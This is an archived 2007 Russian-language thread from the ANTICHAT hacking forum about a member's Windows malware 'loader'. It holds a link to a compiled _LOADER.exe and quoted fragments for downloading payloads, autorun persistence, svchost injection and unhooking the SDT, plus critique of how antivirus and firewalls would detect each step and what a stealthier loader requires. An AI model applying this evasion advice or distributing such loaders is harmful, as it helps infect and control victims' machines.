ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.06.2007, 17:13
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
rootkit.com
|
|
|
28.06.2007, 18:34
|
|
Постоянный
Регистрация: 29.04.2007
Сообщений: 496
Провел на форуме:
2715445
Репутация:
588
|
|
а можно откомпиленный вариант для тестов? =)
|
|
|
|
29.06.2007, 11:01
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
lordofring.tushino.com/_LOADER.exe
|
|
|
|
29.06.2007, 11:08
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
мдаааааааааааа ...первый вопрос - под чем ты это писал?
|
|
|
|
29.06.2007, 11:54
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
я вот просто не понимаю, ну на*** такие потики создавать? типа вот я написал лоадер. традиционный (91ого года) метод инжекта. Традиционная скачка файлов. Вот и весь лоадер. Поставьте мне плюсики, я крутой кодер. Ну я сам тоже могу написать тебе ДДОС бота какого-нибудь очередного, со стандартным набором ф-ий. Это не кодинг а рисование - переклеивание чужих кусков кода в свои файлы.
А что код у тебя вообще в .h это пиздец конечно.
|
|
|
|
29.06.2007, 13:33
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
А что код у тебя вообще в .h это пиздец конечно.
Что ты имеешь в виду?
Поставьте мне плюсики, я крутой кодер.
+ я не просил 
На ачате я не видел исходников работающего лоадера. А если и выкладывают какой-нить лоадер(без исходников), то это полное г. на которое фаеры и антивири кричат как коты на валерьянку. А тут те работающий пример + исходники.
Согласен, что инжект палёвый, но я ведь добавил восстановление sdt.
|
|
|
|
02.07.2007, 16:18
|
|
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
Провел на форуме:
2009677
Репутация:
472
|
|
А тут те работающий пример + исходники.
ну и какой код из своего лоадера ты сам писал?
|
|
|
|
02.07.2007, 16:31
|
|
Участник форума
Регистрация: 09.02.2004
Сообщений: 122
Провел на форуме:
1089794
Репутация:
134
|
|
.h - header file (заголовочный файл)
Код правильнее хранить в .cpp-файлах.
|
|
|
|
02.07.2007, 16:53
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375
Репутация:
4268
|
|
Народ! Могу сказать только одно: критикуя - предлагай!!! Вон берите пример с греата, он небось немало подсказок дал.
__________________
...
|
|
|
|
02.07.2007, 16:56
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
понимаешь ли в чем дело.
Во-первых, у тебя как бы антивирусы молчат, но это если скачивать нормальный файл.
Потому траффик, который ты получишь через
URLDownloadToFile(NULL,FROM,TO,0,NULL);
палится IMONом нод.
Во-вторых, твой уникальнейший ключ реестра Current Version\Run, как и все подобные RunOnce и т.п. палятся anti-spyware аутпоста, глазами юзера да и кто знает чем ещё.
В третьих, неясно что значит строка
if(!Inject(OpenProcess(PROCESS_ALL_ACCESS,false,GetPro cessID("svchost.exe")),&func)) ;
и зачем там нужен if, если потом стоит ;
В четвертых, ZoneAlarm не даст тебе снять хуки sdt. Не даст загрузить драйвер или открыть секцию PHYSICAL MEMORY.
if(_NtOpenSection(&hPhyMem, SECTION_MAP_READ | SECTION_MAP_WRITE, &oAttr ) != STATUS_SUCCESS)
причем, как я понял, это у тебя просто выдрано откуда-то с 99 года сорца, и засунуто в .h файл.
В пятых, не понятно зачем тебе строки
LoadLibrary("KERNEL32_DLL"); //грузим либы
LoadLibrary("USER32_DLL");
да и вообще все остальные.
В шестых, нет никакого смысла в том что ты выложил. Лоадер он на то и лоадер. Что должен не палится. Должен непалевно скачивать файлы. Должен весить очень мало.
Должен не использовать всякие чужие нестабильные ring0-переходы через колгейт. И не должен, наконец, быть собраным из чужих кусков сорцом.
А вообще никаких претензий быть не может, просто тебе было скучно и нечего делать. Я это так понял.
Причем, ладно бы если ты это написал на осенблере.
Типа понтанулся бы)
Как снег когда то понтанулся, выложив bindshell-исходник)
А на c++ уже все остальные нубы умеют((
Этим народ не удивишь.
Последний раз редактировалось KEZ; 02.07.2007 в 17:01..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
